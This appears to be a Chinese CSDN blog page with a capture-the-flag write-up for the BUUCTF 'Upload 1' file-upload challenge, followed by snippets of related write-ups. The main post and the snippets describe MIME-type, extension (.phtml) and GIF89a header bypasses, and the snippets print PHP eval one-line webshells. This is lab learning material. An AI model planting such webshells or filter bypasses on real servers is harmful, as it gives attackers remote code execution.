[极客大挑战 2019]Upload 1

最新推荐文章于 2025-06-29 15:14:38 发布
最新推荐文章于 2025-06-29 15:14:38 发布
阅读量798 收藏 5
点赞数
CC 4.0 BY-SA版权
分类专栏: WEB安全入门 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42900286/article/details/128854671

http://0242d85f-3971-43f6-a721-0b736d192915.node4.buuoj.cn:81/
在这里插入图片描述

解题过程

1.先上传个shell.php
在这里插入图片描述2.提示Not image不是图片,可能是MIME绕过,尝试抓包修改Content-Type
在这里插入图片描述3.提示Not php,猜测可能是检测后缀名不能是php,将shell.php改名为shell.phtml进行上传
在这里插入图片描述4.根据上传提示,不能有<?应该是检查了我们的文件内容,可以使用script脚本的木马,只需要将language修改为php即可
在这里插入图片描述5.这次直接提示我们不是一个图片,检查了我们的文件内容,在文件头中加入GIF89,尝试绕过图片检测

最低0.47元/天 解锁文章

200万优质内容无限畅学
CTF做题笔记--[极客挑战 2019]Upload1
2301_81609355的博客
06-05 1526
以上是我做题的感悟,其实借鉴了许多佬的博客,不会做不要紧,重要的是学会思考,不是看到什么上传就随便传个木马,我们得一步一步来,根据错误信息来构造特定的pyload,也不能只认为绕过的方式就这么多,只会复制粘贴,学会用不同的思路去看待问题。但是蚁剑连接不上,原因是我搞混了,以上猛如虎的操作是针对具有文件包含漏洞而言的,也就是说,只有在网站有文件包含漏洞的情况下才能使用图片马去搞webshell,不然就算图片上传成功了,也不会被服务器执行,是没有用滴!咦,看这些名字,全是传的木马,出题者也懒得清。
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
[极客挑战 2019]Upload1
最新发布
2301_80010998的博客
06-29 243
ctf
Web-[极客挑战 2019] Upload1
汗的博客
05-21 1174
文章目录[极客挑战 2019]Upload1 [极客挑战 2019]Upload1 shell名she.phtml 内容 GIF98a <script language="php">eval($_POST['cmd']);</script> burp抓包Content-Type: image/jpeg 在upload/目录下,访问页面,蚁剑连接,cat /flag ...
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2741
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
极客挑战2019-upload
m0_73303597的博客
12-11 443
自用
[极客挑战 2019]Upload1(详解)
2301_77451464的博客
02-04 2228
这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开。由此可知,图片是有一个图片头的,可以用010editer打开看一下。文件名demo.php。图片头为GIF89a。
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 2187
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
ctf题集【BUUCTF WEB】[极客挑战 2019]Upload1
qq_42667028的博客
01-06 1679
alert("whoami")
(文件上传upload) [极客挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
一醉一休的博客
02-23 1万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客挑战 2019]Upload1 ...
【BUUCTF】[极客挑战 2019]Upload1
aoao331198的博客
03-13 1152
试着上传一个一句话木马的.jpg文件 <?phpeval($_GET['abc']); ?> 看样子是不能用php,必须换一种语言 仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗 GIF89a图片头文件欺骗 上传成功了,接下来我们在BP中上传,截获数据包,并且把 ...
kali[极客挑战 2019]upload 1
01-04
### Kali Linux 中用于极客挑战 2019 的文件上传指令 对于Kali Linux环境下参加极客挑战2019并涉及文件上传的情况,通常会涉及到使用特定平台提供的API或Web界面来完成文件提交的任务。然而,在很多CTF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值